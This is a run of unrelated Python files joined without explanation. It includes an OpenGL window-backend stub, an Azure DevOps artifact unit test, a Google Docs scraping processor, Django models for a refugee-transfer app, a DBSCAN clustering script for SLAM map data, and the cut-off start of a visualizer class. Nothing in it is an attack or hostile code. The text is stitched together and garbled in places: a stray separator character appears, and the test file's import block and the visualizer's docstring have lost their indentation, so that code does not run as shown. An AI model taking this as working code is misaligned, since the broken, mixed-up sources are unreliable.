    def hide(self):
        """ Hide the window and notify listeners. """
        # -> Add toolkit specific code here to hide the native window.
        self.dispatch_event('on_hide')

    def close(self):
        """ Close the window, unschedule its timers and notify listeners. """
        # -> Add toolkit specific code here to destroy the native window.
        if self in __windows__:
            __windows__.remove(self)
        for i in range(len(self._timer_stack)):
            handler, interval = self._timer_stack[i]
            self._clock.unschedule(handler)
        self.dispatch_event('on_close')

    # NotImplemented is a value, not an exception class: `raise(NotImplemented)`
    # is a TypeError on Python 3. The stubs below raise NotImplementedError.
    def set_title(self, title):
        """ Set window title """
        raise NotImplementedError

    def get_title(self, title):
        """ Get window title """
        raise NotImplementedError

    def set_size(self, width, height):
        """ Set window size """
        raise NotImplementedError

    def get_size(self):
        """ Get window size """
        raise NotImplementedError

    def set_position(self, x, y):
        """ Set window position """
        raise NotImplementedError

    def get_position(self):
        """ Get window position """
        raise NotImplementedError

    def swap(self):
        """ Swap GL buffers """
        raise NotImplementedError

    def activate(self):
        """ Make this window the (GL) active window """
        raise NotImplementedError
# ----------------------------------------------------------------- windows ---
def windows():
    """ Return the list of windows currently managed by this backend. """
    return __windows__
# ----------------------------------------------------------------- process ---
def process(dt):
    """ Process events for all windows. Non blocking.

    Returns the number of open windows so the application loop can stop
    once it reaches zero.
    """
    # Poll for and process events
    # -> Add toolkit specific code here to process events
    # -> Must return (non blocking)

    for window in __windows__:
        # Make window active
        window.activate()
        # Clear window using window clear flags
        gl.glClear(window._clearflags)
        # Dispatch the main draw event
        window.dispatch_event('on_draw', dt)
        # Dispatch the idle event
        window.dispatch_event('on_idle', dt)
        # Swap buffers
        window.swap()
    return len(__windows__)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
try:
# Attempt to load mock (works on Python 3.3 and above)
from unittest.mock import patch
except ImportError:
# Attempt to load mock (works on Python version below 3.3)
from mock import patch
from azext_devops.dev.pipelines.runs_artifacts import run_artifact_download, run_artifact_upload, run_artifact_list
from azext_devops.dev.common.services import clear_connection_cache
from azext_devops.test.utils.authentication import AuthenticatedTests
from azext_devops.devops_sdk.v5_0.build.build_client import BuildClient
from azext_devops.dev.common.const import ARTIFACTTOOL_PAT_ENVKEY
class TestPipelinesRunsArtifactsMethods(AuthenticatedTests):
    """Unit tests for run-artifact list/download/upload; all service calls mocked."""

    # Dummy connection/identity values shared by every test.
    _TEST_DEVOPS_ORGANIZATION = 'https://someorganization.visualstudio.com'
    _TEST_DEVOPS_PROJECT = 'MyProject'
    _TEST_PAT_TOKEN = 'Some_PAT_Token'
    _TEST_ARTIFACT_NAME = 'artifactname'
    _TEST_ARTIFACT_PATH = 'D:/Testpath'

    def setUp(self):
        # Authenticate, then patch out every outbound service call.
        self.authentication_setup()
        self.authenticate()
        self.get_client_patcher = patch('azext_devops.devops_sdk.connection.Connection.get_client')
        self.get_artifacts_patcher = patch('azext_devops.devops_sdk.v5_0.build.build_client.BuildClient.get_artifacts')
        self.run_artifacttool_patcher = patch('azext_devops.dev.common.artifacttool.ArtifactToolInvoker.run_artifacttool')
        #start the patchers
        self.mock_get_artifacts = self.get_artifacts_patcher.start()
        self.mock_get_client = self.get_client_patcher.start()
        self.mock_run_artifacttool = self.run_artifacttool_patcher.start()
        # Set return values which will be same across tests
        self.mock_get_client.return_value = BuildClient(base_url=self._TEST_DEVOPS_ORGANIZATION)
        #clear connection cache before running each test
        clear_connection_cache()

    def tearDown(self):
        # Stops every patcher started in setUp.
        patch.stopall()

    def test_runs_artifacts_list(self):
        # Listing should query the build client with the run id as build id.
        response = run_artifact_list(run_id=12345, organization=self._TEST_DEVOPS_ORGANIZATION,
                                     project=self._TEST_DEVOPS_PROJECT, detect=None)
        #assert
        self.mock_get_artifacts.assert_called_once_with(build_id=12345, project=self._TEST_DEVOPS_PROJECT)

    def test_runs_artifacts_download(self):
        # Download should shell out to artifacttool with a 'download' verb.
        response = run_artifact_download(
            run_id=12345, artifact_name=self._TEST_ARTIFACT_NAME, path=self._TEST_ARTIFACT_PATH,
            organization=self._TEST_DEVOPS_ORGANIZATION, project=self._TEST_DEVOPS_PROJECT, detect=None)
        #assert
        self.mock_run_artifacttool.assert_called_with(self._TEST_DEVOPS_ORGANIZATION,
                                                      [
                                                          'pipelineartifact',
                                                          'download',
                                                          '--service', self._TEST_DEVOPS_ORGANIZATION,
                                                          '--patvar', ARTIFACTTOOL_PAT_ENVKEY,
                                                          '--project', self._TEST_DEVOPS_PROJECT,
                                                          '--pipeline-id', 12345,
                                                          '--artifact-name', self._TEST_ARTIFACT_NAME,
                                                          '--path', self._TEST_ARTIFACT_PATH,
                                                      ],
                                                      'Downloading')

    def test_runs_artifacts_upload(self):
        # Upload should shell out to artifacttool with a 'publish' verb.
        response = run_artifact_upload(
            run_id=12345, artifact_name=self._TEST_ARTIFACT_NAME, path=self._TEST_ARTIFACT_PATH,
            organization=self._TEST_DEVOPS_ORGANIZATION, project=self._TEST_DEVOPS_PROJECT, detect=None)
        #assert
        self.mock_run_artifacttool.assert_called_with(self._TEST_DEVOPS_ORGANIZATION,
                                                      [
                                                          'pipelineartifact',
                                                          'publish',
                                                          '--service', self._TEST_DEVOPS_ORGANIZATION,
                                                          '--patvar', ARTIFACTTOOL_PAT_ENVKEY,
                                                          '--project', self._TEST_DEVOPS_PROJECT,
                                                          '--pipeline-id', 12345,
                                                          '--artifact-name', self._TEST_ARTIFACT_NAME,
                                                          '--path', self._TEST_ARTIFACT_PATH,
                                                      ],
                                                      'Uploading')
# Run the suite when executed directly.
if __name__ == '__main__':
    unittest.main()
import urllib.parse
import bs4
import copy
import hashlib
import os.path
import traceback
import WebRequest
from WebMirror.processor.ProcessorBase import PageProcessor
# import TextScrape.SiteArchiver
import common.util.urlFuncs as urlFuncs
import WebMirror.processor.ProcessorUtils.gDocParse as gdp
# import TextScrape.RelinkLookup
# import TextScrape.RELINKABLE as RELINKABLE
########################################################################################################################
#
# ## ## ### #### ## ## ###### ## ### ###### ######
# ### ### ## ## ## ### ## ## ## ## ## ## ## ## ## ##
# #### #### ## ## ## #### ## ## ## ## ## ## ##
# ## ### ## ## ## ## ## ## ## ## ## ## ## ###### ######
# ## ## ######### ## ## #### ## ## ######### ## ##
# ## ## ## ## ## ## ### ## ## ## ## ## ## ## ## ##
# ## ## ## ## #### ## ## ###### ######## ## ## ###### ######
#
########################################################################################################################
class GdocPageProcessor(PageProcessor):
    """Processor for Google Docs pages.

    Extracts the document body, outbound links and embedded resources
    (images, attachments) from a fetched Google Docs page, and maintains
    the domain/TLD filter sets used to decide which outgoing links should
    be followed or relinked.
    """

    # Only HTML pages are handed to this processor.
    wanted_mimetypes = ['text/html']
    want_priority = 90

    @staticmethod
    def wantsUrl(url):
        # isGdocUrl() returns a tuple whose first element is the boolean
        # "this is a google docs URL" flag.
        return urlFuncs.isGdocUrl(url)[0]

    loggerPath = "Main.Text.GdocPageProcessor"

    def __init__(self, pageUrl, pgContent, loggerPath, relinkable, scannedDomains=None, tlds=None, **kwargs):
        """
        Args:
            pageUrl (str): URL of the google doc being processed.
            pgContent: Raw page content (not used directly here; the doc is
                re-fetched through gDocParse).
            loggerPath (str): Parent logger path; ".GDocExtract" is appended.
            relinkable (iterable): Domains whose links should be relinked.
            scannedDomains (iterable|str|None): Additional domains to scan.
            tlds (iterable|None): Additional TLDs used to expand multi-TLD
                hosts (e.g. blogspot mirrors).
        """
        self.loggerPath = loggerPath + ".GDocExtract"
        self.pageUrl = pageUrl

        self._relinkDomains = set()
        for url in relinkable:
            self._relinkDomains.add(url)

        self._tld = set()
        self._scannedDomains = set()

        # Tell the path filtering mechanism that we can fetch google doc files.
        # Not switchable, since not fetching google docs content from a google
        # docs page wouldn't work too well.
        self._scannedDomains.add('https://docs.google.com/document/')
        self._scannedDomains.add('https://docs.google.com/spreadsheets/')
        self._scannedDomains.add('https://drive.google.com/folderview')
        self._scannedDomains.add('https://drive.google.com/open')

        if not scannedDomains:
            scannedDomains = []
        if not tlds:
            tlds = []

        # Build the filtering structures for checking outgoing links.
        for tld in tlds:
            self._tld.add(tld)

        if isinstance(scannedDomains, (set, list)):
            for url in scannedDomains:
                self.installBaseUrl(url)
        else:
            # A single bare string was passed.
            self.installBaseUrl(scannedDomains)

        # File mapping LUT: original resource filename -> md5 hash of its content.
        self.fMap = {}

    def installBaseUrl(self, url):
        """Register `url`'s host (and common mirror spellings) as scanned.

        Wordpress and blogspot hosts are expanded to their 'www.', '.files.'
        and alternate-TLD variants so links to any spelling are recognised.

        Raises:
            ValueError: if `url` has no parseable network location.
        """
        netloc = urllib.parse.urlsplit(url.lower()).netloc
        if not netloc:
            raise ValueError("One of the scanned domains collapsed down to an empty string: '%s'!" % url)

        # Generate the possible wordpress netloc values.
        if 'wordpress.com' in netloc:
            subdomain, mainDomain, tld = netloc.rsplit(".")[-3:]
            self._scannedDomains.add("www.{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
            self._scannedDomains.add("{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
            self._scannedDomains.add("www.{sub}.files.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
            self._scannedDomains.add("{sub}.files.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))

        # Blogspot is annoying and sometimes a single site is spread over
        # several tlds. *.com, *.sg, etc...
        if 'blogspot.' in netloc:
            subdomain, mainDomain, tld = netloc.rsplit(".")[-3:]
            self._tld.add(tld)
            for tld in self._tld:
                self._scannedDomains.add("www.{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))
                self._scannedDomains.add("{sub}.{main}.{tld}".format(sub=subdomain, main=mainDomain, tld=tld))

        if 'sites.google.com/site/' in url:
            # Google Sites pages are scanned by full URL prefix, not by host.
            self._scannedDomains.add(url)
        elif 'google.' in netloc:
            self.log.info("Skipping URL: '%s'", url)
        else:
            base, tld = netloc.rsplit(".", 1)
            self._tld.add(tld)
            for tld in self._tld:
                self._scannedDomains.add("{main}.{tld}".format(main=base, tld=tld))

    # ------------------------------------------------------------------
    # Google-doc content handling
    # ------------------------------------------------------------------

    def processGdocResources(self, resources):
        """Hash and classify the resource files attached to a google doc.

        Args:
            resources: iterable of (fName, mimeType, content) tuples.

        Returns:
            list of (fName, mimeType, content, pseudoUrl) tuples, where
            pseudoUrl is "gdoc-<md5 of content>". Unknown MIME types are
            logged and dropped.
        """
        ret = []
        for fName, mimeType, content in resources:
            m = hashlib.md5()
            m.update(content)
            fHash = m.hexdigest()
            pseudoUrl = "gdoc-" + fHash

            # Remember the hash under the *full* original name; only the
            # basename is reported onwards.
            self.fMap[fName] = fHash
            fName = os.path.split(fName)[-1]

            self.log.info("Resource = '%s', '%s', '%s'", fName, mimeType, pseudoUrl)
            if mimeType in ["image/gif", "image/jpeg", "image/pjpeg", "image/png", "image/svg+xml", "image/vnd.djvu"]:
                self.log.info("Processing resource '%s' as an image file. (mimetype: %s)", fName, mimeType)
                ret.append((fName, mimeType, content, pseudoUrl))
            elif mimeType in ["application/octet-stream"]:
                self.log.info("Processing '%s' as an binary file.", fName)
                ret.append((fName, mimeType, content, pseudoUrl))
            else:
                self.log.warn("Unknown MIME Type? '%s', FileName: '%s'", mimeType, fName)

        if len(resources) == 0:
            self.log.info("File had no resource content!")
        return ret

    def cleanGdocPage(self, soup, url):
        """Strip google-doc styling cruft from `soup`; return (title, soup)."""
        title = self.extractTitle(soup, url)
        # Spans carry only inline styling - unwrap them to flatten the markup.
        for span in soup.find_all("span"):
            span.unwrap()
        for style in soup.find_all('style'):
            style.decompose()
        # Class attributes reference the stripped stylesheets; drop them too.
        for tag in soup.find_all(attrs={'class': True}):
            del tag['class']
        return title, soup

    # Hook so plugins can modify the internal URLs as part of the relinking process.
    def preprocessGdocReaderUrl(self, inUrl):
        if inUrl.lower().endswith("/preview"):
            inUrl = inUrl[:-len("/preview")]
        return inUrl

    def convertToGdocReaderImage(self, srcUrl):
        """Map a resource URL onto the local /books/render path via its content hash.

        Raises:
            ValueError: if `srcUrl` does not match any known resource name.
        """
        itemHash = None
        # fMap keys are the original resource names; match by suffix because
        # the source URL may carry a path/query prefix. If several names
        # match, the last one wins (preserves historical behaviour).
        for rscEnd in self.fMap:
            if srcUrl.endswith(rscEnd):
                itemHash = self.fMap[rscEnd]
        if not itemHash:
            raise ValueError("Unknown image URL! = '%s' (hash '%s')" % (srcUrl, itemHash))
        url = '/books/render?mdsum=%s' % urllib.parse.quote(itemHash)
        return url

    def processGdocPage(self, url, content):
        """Clean, relink and unwrap a fetched google doc page.

        Returns:
            (plainLinks, imageLinks, pgTitle, pgBody) - imageLinks is always
            empty since images come through as resource files instead.
        """
        dummy_fName, content = content
        soup = WebRequest.as_soup(content)
        urlFuncs.canonizeUrls(soup, url)
        pgTitle, soup = self.cleanGdocPage(soup, url)
        plainLinks = self.extractLinks(soup, url)
        self.log.info("Page title = '%s'", pgTitle)
        soup = self.relink(soup, imRelink=self.convertToGdocReaderImage)
        url = self.preprocessGdocReaderUrl(url)
        url = urlFuncs.trimGDocUrl(url)
        # Since the content we're extracting will be embedded into another
        # page, strip out the <body> and <html> tags. `unwrap()` replaces the
        # soup with the contents of the tag it's called on. We end up with
        # just the contents of the <body> tag.
        soup.body.unwrap()
        pgBody = soup.prettify()
        # No image links, since they're served as resource files in a google doc.
        imageLinks = []
        return plainLinks, imageLinks, pgTitle, pgBody

    def retreiveGoogleDoc(self, url):
        """Fetch and process the google doc at `url`, retrying up to 4 times.

        Returns:
            (plainLinks, imageLinks, pgTitle, pgBody, resources)

        Raises:
            urlFuncs.CannotAccessGDocException: if extraction fails or the
                page comes back empty repeatedly.
        """
        self.log.info("Should fetch google doc at '%s'", url)
        doc = gdp.GDocExtractor(url)
        attempts = 0
        mainPage = None
        while 1:
            attempts += 1
            try:
                mainPage, resources = doc.extract()
            except TypeError:
                self.log.critical('Extracting item failed!')
                for line in traceback.format_exc().strip().split("\n"):
                    self.log.critical(line.strip())
                raise urlFuncs.CannotAccessGDocException("Cannot access google doc! Is it protected?")
            if mainPage:
                break
            if attempts > 3:
                # BUGFIX: this previously raised TextScrape.SiteArchiver.DownloadException,
                # but the TextScrape import is commented out at module scope, so
                # hitting this path died with a NameError instead. Raise the
                # exception type callers of this processor already handle.
                raise urlFuncs.CannotAccessGDocException(
                    "Repeatedly failed to extract google doc content at '%s'!" % url)
        resources = self.processGdocResources(resources)
        return self.processGdocPage(url, mainPage) + (resources, )

    def extractContent(self):
        """Entry point: fetch, permute and clean a google doc page.

        Returns:
            dict with keys: 'plainLinks', 'rsrcLinks', 'title', 'contents',
            'resources'.
        """
        plainLinks, imageLinks, pgTitle, pgBody, resources = self.retreiveGoogleDoc(self.pageUrl)
        ret = {}
        ret['plainLinks'] = plainLinks
        ret['rsrcLinks'] = imageLinks
        ret['title'] = pgTitle
        ret['contents'] = pgBody
        ret['resources'] = resources
        return ret
def test():
    """Manual smoke test: fetch a known public google doc and dump its links/resources."""
    print("Test mode!")
    import WebRequest
    import logSetup
    logSetup.initLogging()
    wg = WebRequest.WebGetRobust()
    # content = wg.getpage('http://www.arstechnica.com')
    # NOTE(review): GdocPageProcessor.__init__ requires at least
    # (pageUrl, pgContent, loggerPath, relinkable); only three positional
    # args are passed here, so this raises TypeError as written -- confirm
    # the intended signature / update this smoke test.
    scraper = GdocPageProcessor('https://docs.google.com/document/d/1atXMtCutHRpcHwSRS5UyMAC58_gQjMPR2dDVn1LCD3E', 'Main.Test', 'testinating')
    print(scraper)
    # NOTE(review): extractContent() returns a single dict (with a
    # 'resources' key); unpacking into two names will raise -- this test
    # likely predates the dict-based return value.
    extr, rsc = scraper.extractContent()
    print('Plain Links:')
    for link in extr['plainLinks']:
        print(link)
    print()
    print()
    print('Resource files:')
    # for link in extr['rsrcLinks']:
    # 	print(link)
    for fName, mimeType, content, pseudoUrl in rsc:
        print(fName, mimeType, pseudoUrl)
    # print(extr['contents'])
if __name__ == "__main__":
    # Run the manual smoke test when executed directly.
    test()

# organization/models.py -- refugee-management project
from django.conf import settings
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from locations.models import City, Route
from refugee_management.models import CreateUpdateModel
TIMEZONE = settings.TIME_ZONE
class Organization(models.Model):
    """An aid organization offering transfers; `name` is the natural key."""
    name = models.CharField(_("Name"), max_length=255, unique=True)
    # Optional free-form postal address.
    address = models.CharField(_("Address"), max_length=255, null=True, blank=True)
    class Meta:
        verbose_name = _("Organization")
        verbose_name_plural = _("Organizations")
    def __str__(self):
        return self.name
class Helper(models.Model):
    """Links a user account to an organization with a role (admin or helper)."""
    # Account-type choice values.
    ADMIN = 1
    HELPER = 2
    ACCOUNT_TYPES = ((ADMIN, _("Admin")), (HELPER, _("Helper")))
    # Nullable: the helper survives deletion of its organization (SET_NULL).
    organization = models.ForeignKey(
        Organization,
        verbose_name=_("Organization"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
    )
    account_user = models.OneToOneField(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
    )
    account_type = models.IntegerField(_("Account type"), choices=ACCOUNT_TYPES)
    # Set True once the organization has vetted this helper.
    verified = models.BooleanField(_("Verified"), default=False)
    class Meta:
        verbose_name = _("Helper")
        verbose_name_plural = _("Helpers")
    def __str__(self):
        first_name = self.account_user.first_name
        last_name = self.account_user.last_name
        email = self.account_user.email
        return f"{first_name if first_name else ''} {last_name if last_name else ''} - {email}"
    def as_dict(self):
        """Serialize this helper for API responses."""
        return {
            "id": self.id,
            # BUGFIX: organization is nullable (on_delete=SET_NULL); the
            # unconditional `.name` dereference raised AttributeError for
            # orphaned helpers.
            "organization": self.organization.name if self.organization else None,
            "first_name": self.account_user.first_name,
            "last_name": self.account_user.last_name,
            "email": self.account_user.email,
            # NOTE(review): assumes the custom user model defines `phone` -- confirm.
            "phone": self.account_user.phone,
            "account_type": self.get_account_type_display(),
            "verified": self.verified,
        }
class OrganizationTransferRules(CreateUpdateModel):
    """A named, reusable set of rules an organization attaches to its transfers."""
    headline = models.CharField(_("Headline"), unique=True, max_length=63)
    rules = models.TextField(_("Rules"))
    # Nullable: the rule set survives deletion of its organization (SET_NULL).
    organization = models.ForeignKey(
        Organization,
        verbose_name=_("Organization"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
    )
    class Meta:
        verbose_name = _("Organization Transfer Rules")
        verbose_name_plural = _("Organizations Transfer Rules")
    def __str__(self):
        # NOTE(review): organization is nullable; this raises AttributeError
        # for orphaned rows -- confirm whether a None guard is wanted here.
        return f"{self.headline}: {self.organization.name}"
class OrganizationPickUpPoint(models.Model):
    """A city + address where an organization picks up passengers."""
    # Nullable: the pick-up point survives deletion of its organization (SET_NULL).
    organization = models.ForeignKey(
        Organization,
        verbose_name=_("Organization"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
    )
    city = models.ForeignKey(City, verbose_name=_("City"), on_delete=models.CASCADE)
    address = models.CharField(_("Address"), max_length=255)
    class Meta:
        verbose_name = _("Organization Pick Up point")
        verbose_name_plural = _("Organization Pick Up points")
        # A given address within a city may only be registered once,
        # regardless of organization.
        unique_together = ("city", "address")
    def __str__(self):
        return f"{self.city}: {self.address}"
class OrganizationRoute(models.Model):
    """This model connects an organization with possible routes for search purposes."""
    route = models.ForeignKey(
        Route,
        verbose_name=_("Route"),
        on_delete=models.CASCADE,
    )
    organization = models.ForeignKey(
        Organization,
        verbose_name=_("Organization"),
        on_delete=models.CASCADE,
    )
    class Meta:
        verbose_name = _("Organization Route")
        verbose_name_plural = _("Organization Routes")
    def __str__(self):
        return f"Route: {self.route.id}, Organization: {self.organization}"
class Transfer(CreateUpdateModel):
    """A single scheduled trip along an organization's route, with capacity,
    amenities and assigned helpers."""
    # Vehicle-type choice values.
    CAR = 1
    BUS = 2
    VEHICLE_CHOICES = ((CAR, _("Car")), (BUS, _("Bus")))
    organization_route = models.ForeignKey(
        OrganizationRoute,
        verbose_name=_("Organization route"),
        on_delete=models.CASCADE,
    )
    # Primary helper responsible for the transfer; nullable (SET_NULL).
    helper = models.ForeignKey(
        Helper,
        verbose_name=_("Helper"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
        related_name="primary_helper",
    )
    secondary_helper = models.ForeignKey(
        Helper,
        verbose_name=_("Secondary Helper"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
        related_name="secondary_helper",
    )
    start_time = models.DateTimeField(_("Start time"), null=True, blank=True)
    refugee_seats = models.IntegerField(
        _("Refugee seats"),
        default=1,
        validators=[MinValueValidator(1), MaxValueValidator(1000)],
    )
    helper_seats = models.IntegerField(
        _("Helper seats"),
        default=0,
        validators=[MinValueValidator(0), MaxValueValidator(1000)],
    )
    driver_seats = models.IntegerField(
        _("Driver seats"),
        default=1,
        validators=[MinValueValidator(1), MaxValueValidator(1000)],
    )
    vehicle = models.IntegerField(_("Vehicle type"), choices=VEHICLE_CHOICES, null=True, blank=True)
    vehicle_registration_number = models.CharField(
        _("Vehicle registration number"), max_length=60, null=True, blank=True
    )
    # Amenities offered on board.
    food = models.BooleanField(_("Food "), default=False)
    drinks = models.BooleanField(_("Drinks"), default=False)
    blanket = models.BooleanField(_("Blanket"), default=False)
    healthcare = models.BooleanField(_("Healthcare personnel"), default=False)
    translators = models.CharField(_("Translators"), max_length=255, null=True, blank=True)
    description = models.TextField(_("Additional remarks"), null=True, blank=True)
    rules = models.ForeignKey(
        OrganizationTransferRules,
        verbose_name=_("Rules"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
    )
    active = models.BooleanField(_("Active"), default=True)
    class Meta:
        verbose_name = _("Transfer")
        verbose_name_plural = _("Transfers")
    def __str__(self):
        return f"{self.id}"
    @property
    def stopovers(self):
        """All stopovers for this transfer, ordered by departure time."""
        return TransferRouteDetails.objects.filter(transfer=self).select_related("city").order_by("departure_time")
    @property
    def stopovers_text(self):
        """Human-readable 'A -> B -> C' list of all stopover cities."""
        return " -> ".join([i.city.name for i in self.stopovers])
    @property
    def route_text(self):
        """Short 'origin -> destination' label.

        NOTE(review): raises IndexError when the transfer has no stopovers
        yet -- confirm whether callers guarantee at least one.
        """
        cities = [str(i.city) for i in self.stopovers]
        return f"{cities[0]} -> {cities[-1]}"
    def as_dict(self, helper_view=False, refugee_view=False):
        """Serialize the transfer.

        Args:
            helper_view (bool): include organization/vehicle/helper details.
            refugee_view (bool): strip fields refugees should not see.
        """
        dict_obj = {
            "id": self.pk,
            "refugee_seats": self.refugee_seats,
            "food": self.food,
            "drinks": self.drinks,
            "blanket": self.blanket,
            "healthcare": self.healthcare,
            "translators": self.translators,
            "route": self.stopovers_text,
            "start_time": timezone.localtime(self.start_time).strftime("%d/%m/%Y %H:%M") if self.start_time else None,
            "rules": self.rules.rules if self.rules else None,
        }
        hidden_dict = {}
        if helper_view:
            hidden_dict = {
                "organization": self.organization_route.organization.name,
                "helper": self.helper.account_user.email if self.helper else None,
                # BUGFIX: Helper has no `email` field; the address lives on the
                # related user account (consistent with the `helper` entry above).
                "secondary_helper": self.secondary_helper.account_user.email if self.secondary_helper else None,
                "helper_seats": self.helper_seats,
                "driver_seats": self.driver_seats,
                "vehicle": self.get_vehicle_display() if self.vehicle else None,
                "vehicle_registration_number": self.vehicle_registration_number,
                "description": self.description,
            }
        dict_obj = {**dict_obj, **hidden_dict}
        if refugee_view:
            hidden_fields = ["id", "helper_seats", "driver_seats", "description"]
            dict_obj = {k: v for k, v in dict_obj.items() if k not in hidden_fields}
        return dict_obj
class TransferRouteDetails(models.Model):
    """A stopover (city + address + departure time) on a transfer's route."""
    # Nullable: the stopover row survives deletion of its transfer (SET_NULL).
    transfer = models.ForeignKey(
        Transfer,
        verbose_name=_("Transfer"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
    )
    city = models.ForeignKey(
        City,
        verbose_name=_("City"),
        on_delete=models.SET_NULL,
        null=True,
        blank=True,
        related_name="org_transfer_city",
    )
    address = models.CharField(_("Address"), max_length=255, null=True, blank=True)
    departure_time = models.DateTimeField(_("Departure time"))
    class Meta:
        verbose_name = _("Transfer Route Details")
        verbose_name_plural = _("Transfer Route Details")
    def __str__(self):
        return f"{self.transfer}: {self.city} at {self.departure_time}"
    def as_dict(self):
        """Serialize this stopover for API responses."""
        # NOTE(review): city is nullable (SET_NULL); `self.city.name` raises
        # AttributeError if the city was deleted -- confirm intent.
        return {
            "id": self.id,
            "city": self.city.name,
            "address": self.address,
            "departure_time": timezone.localtime(self.departure_time).strftime("%d/%m/%Y %H:%M")
            if self.departure_time
            else None,
        }

# Semantic_SLAM: DBSCAN clustering of the semantic map
# coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
import sklearn.datasets as ds
import matplotlib.colors
from sklearn.cluster import DBSCAN
from sklearn.preprocessing import StandardScaler
def expand(a, b):
    """Widen the interval [a, b] by 10% of its span on each side."""
    margin = (b - a) * 0.1
    return a - margin, b + margin
if __name__ == "__main__":
    # ---- Load the semantic map written by semantic-SLAM -----------------
    # Each line holds space-separated fields; consecutive spaces produce
    # empty fields, which are stripped out below.
    data = []
    with open("../../semantic-SLAM/src/semantic_map.txt", "r") as f:
        for line in f:
            line = line.strip('\n')
            line = line.split(' ')
            # NOTE(review): remove('') raises ValueError when no empty field
            # is present -- assumes the input always contains double spaces.
            line.remove('')
            if " " in line:
                line.remove(' ')
            data.append(line)
    print(np.shape(data))
    data = np.array(data)
    # Columns 0, 2, ... hold coordinates; column 3 is the semantic class label.
    data, c = data[:, 0::2], data[:, 3]
    Data = []
    print(np.shape(data))
    for i in range(np.shape(data)[0]):
        for j in range(np.shape(data)[1]):
            data[i, j] = float(data[i, j])
    print(np.shape(data))
    # Keep only the points whose semantic class label is '200'.
    for i in range(np.size(c)):
        if c[i] == '200':
            Data.append(data[i])
    Data = np.array(Data)
    print(np.shape(Data))
    Data = StandardScaler().fit_transform(Data)
    # Rescale the standardized coordinates so the epsilon values below are usable.
    data = Data * 1000
    print(np.shape(Data))
    print('Done.')
    # Candidate (epsilon, min_samples) parameter pairs for dataset 1.
    params = ((200, 50), (200, 100), (225, 150), (130, 70), (100, 100), (100, 150))
    # Dataset 2 (synthetic concentric circles) -- kept for reference:
    # t = np.arange(0, 2*np.pi, 0.1)
    # data1 = np.vstack((np.cos(t), np.sin(t))).T
    # data2 = np.vstack((2*np.cos(t), 2*np.sin(t))).T
    # data3 = np.vstack((3*np.cos(t), 3*np.sin(t))).T
    # data = np.vstack((data1, data2, data3))
    # # # corresponding (epsilon, min_sample) parameters for dataset 2:
    # params = ((0.5, 3), (0.5, 5), (0.5, 10), (1., 3), (1., 10), (1., 20))
    matplotlib.rcParams['font.sans-serif'] = [u'Droid Sans Fallback']
    matplotlib.rcParams['axes.unicode_minus'] = False
    plt.figure(figsize=(24, 16), facecolor='w')
    plt.suptitle(u'DBSCAN clustering', fontsize=20)
    i = 2
    eps, min_samples = params[i]
    model = DBSCAN(eps=eps, min_samples=min_samples)
    model.fit(data)
    y_hat = model.labels_
    core_indices = np.zeros_like(y_hat, dtype=bool)
    core_indices[model.core_sample_indices_] = True
    y_unique = np.unique(y_hat)
    # Label -1 marks noise points and is not counted as a cluster.
    n_clusters = y_unique.size - (1 if -1 in y_hat else 0)
    print(y_unique, 'cluster number:', n_clusters)
    # plt.subplot(2, 3, i+1)
    # One color per cluster id.
    clrs = plt.cm.Spectral(np.linspace(0, 0.8, y_unique.size))
    # BUGFIX: was the Python-2 statement `print clrs` -- a SyntaxError under
    # Python 3 (the rest of this script already uses print() calls).
    print(clrs)
    for k, clr in zip(y_unique, clrs):
        cur = (y_hat == k)
        if k == -1:
            # Noise points: small black dots.
            plt.scatter(data[cur, 0], data[cur, 1], s=20, c='k')
            continue
        plt.scatter(data[cur, 0], data[cur, 1], s=30, c=clr, edgecolors='k')
        # plt.scatter(data[cur & core_indices][:, 0], data[cur & core_indices][:, 1], s=60, c=clr, marker='o', edgecolors='k')
    x1_min, x2_min = np.min(data, axis=0)  # column-wise minima
    x1_max, x2_max = np.max(data, axis=0)  # column-wise maxima
    x1_min, x1_max = expand(x1_min, x1_max)
    x2_min, x2_max = expand(x2_min, x2_max)
    plt.xlim((x1_min, x1_max))
    plt.ylim((x2_min, x2_max))
    plt.grid(True)
    # BUGFIX: the `ur'...'` string prefix is invalid syntax in Python 3;
    # a plain raw string is sufficient for the LaTeX title.
    plt.title(r'$\epsilon$ = %.1f m = %d, cluster number:%d' % (eps, min_samples, n_clusters), fontsize=16)
    plt.tight_layout()
    plt.subplots_adjust(top=0.9)
    plt.show()
from torch.utils.tensorboard import SummaryWriter
from torchvision import transforms
from datasets.dataset_processors import ExtendedDataset
from models.model import ResNet50
from models.siamese import MssNet
from base import BaseExecutor
from utils.utilities import type_error_msg, value_error_msg, timer, load_model
from configparser import ConfigParser
from os.path import join
import matplotlib.pyplot as plt
from scipy.io import loadmat
from collections import Counter, OrderedDict, Iterable
from shutil import rmtree
from math import ceil
import torch
import numpy as np
class Visualizer(BaseExecutor):
"""A general visualizer.
Args:
config (ConfigParser): The ConfigParser which reads setting files.
name (str): A name defined in base.py.
model (str): A model defined in base.py.
pretrain (bool): Use saved pretrained models or not.
epoch (int): The epoch of the saved trained model for visualizing.
split (str): A split protocol defined in base.py.
scene (str): A scene defined in base.py.
query_list (list): A list of query indices.
length (int): The length of ranking list.
Attributes:
writer (SummaryWriter): The writer writes out events and summaries to the event file.
train_path (str): Path to save loss/error in every epoch.
test_path (str): Path to the dictionary of gallery and query info.
evaluation_path (str): Path to the dictionary of evaluation indicators and rank lists.
"""
